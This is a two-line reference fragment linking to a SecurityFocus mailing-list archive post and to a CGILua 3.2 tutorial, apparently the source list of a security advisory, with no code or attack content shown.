REF:http://www.securityfocus.com/archive/1/archive/1/509142/100/0/threaded
Tutorial CGILua 3.2 :http://www.yumpu.com/pt/document/view/5904124/tutorial-cgilua-32